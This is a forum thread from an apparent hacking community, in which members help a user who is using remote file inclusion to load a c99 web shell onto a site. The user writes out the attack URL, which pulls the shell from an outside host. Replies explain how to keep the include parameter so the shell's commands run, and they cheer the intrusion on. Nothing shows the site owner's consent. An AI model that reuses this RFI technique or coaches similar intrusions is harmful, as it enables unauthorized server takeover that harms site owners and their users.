Donate to us via Paypal!
Your life is ending one minute at a time. If you were to die tomorrow, what would you do today?
Thursday, October 29, 2020
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 100
Guests Online: 98
Members Online: 2

Registered Members: 129475
Newest Member: zdog
Latest Articles

View Thread

HellBound Hackers | Computer General | Web hacking

Author

c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 19:18
ok I have found a RFI exploit on this site and whatever. I have the shell coming up because this worked: http://www.site.com/index.php?http://www.jhn.com/c99.txt
So the shell comes up and lists all the files and directories.
All so good so far until i try to click on a file/folder or run a command and this comes up:
Code
Warning: include(What ever i'm accessing) [function.include]: failed to open stream: No such file or directory in /var/www/htdocs/ on line 207

Warning: include() [function.include]: Failed opening '(what ever i'm accessing)' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/ on line 207


or something like that

I tried to upload the shell in the htdocs dir but it always says "file cannot be uploaded from * to /var/www/htdocs

Any insight in what is going on?


Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 20:03
Hehe I remember doing the same mistake back on my 1st attempt to RFI Smile

U c what u did is exploit a get variable right? U used that variable to INCLUDE ur code to the victim's server.

However, when u click on a folder there are also many get variables from ur shell which indicate the file, command or blah blah u wish to execute etc...

Notice however, that smth is missing, Grin U gotta find it now hehe Smile

PS: Happy hacking ^^



Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 20:22
OoO ok i sorta get what you are saying so i have to sorta customize the shell for that site
I'll try that later on


Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 20:26
No u don't have to customize anything Pfft
Just don't forget the variable u used to include the shell else when trying to execute any commands, ur shell will not be included at all (da error) Smile

If u still don't get it I'll reply with full explanation later. For now i gtg Sad
Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 20:39
ok i understand about 80%...i'll give it a try in about 2 hours or so...but thanx




Edited by on 04-05-07 20:39
Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 22:06
well i know what is wrong but i don't know how to make i work still:angry:


Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 22:54
Well, I'm not the kind of person who answers questions with riddles so I'm going to break it down to you:

Here is an example of a URL vulnerable to RFI:

Code
http://www.website.com/index.php?page=about.htm




In this example "page" is being Included. Also you see "page" equals
"about.htm" (so about.htm is included)
If the code doesn't limit the things that can be filled in behind ?page= you can include any file you want. This is where your shell comes in ;)

Now if you look at the example URL and you understand what's happening you will notice that you forgot one crucial thing...
The ?page= part !

This should help you fulfill you noble mission :)
Good luck!

S-H


Author

RE: c99 hack/problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 04-05-07 23:35
i get that part but the and stuff because i got the shell to show all the files and folders....it's just everytime i try to run a cmd or go to a file/folder the error comes up....
plus the site i'm hacking is http://www.site.com/index.php?http://shell

it does not have nothing like the page= stuff it is just
index.php?RFI




Edited by on 06-05-07 00:54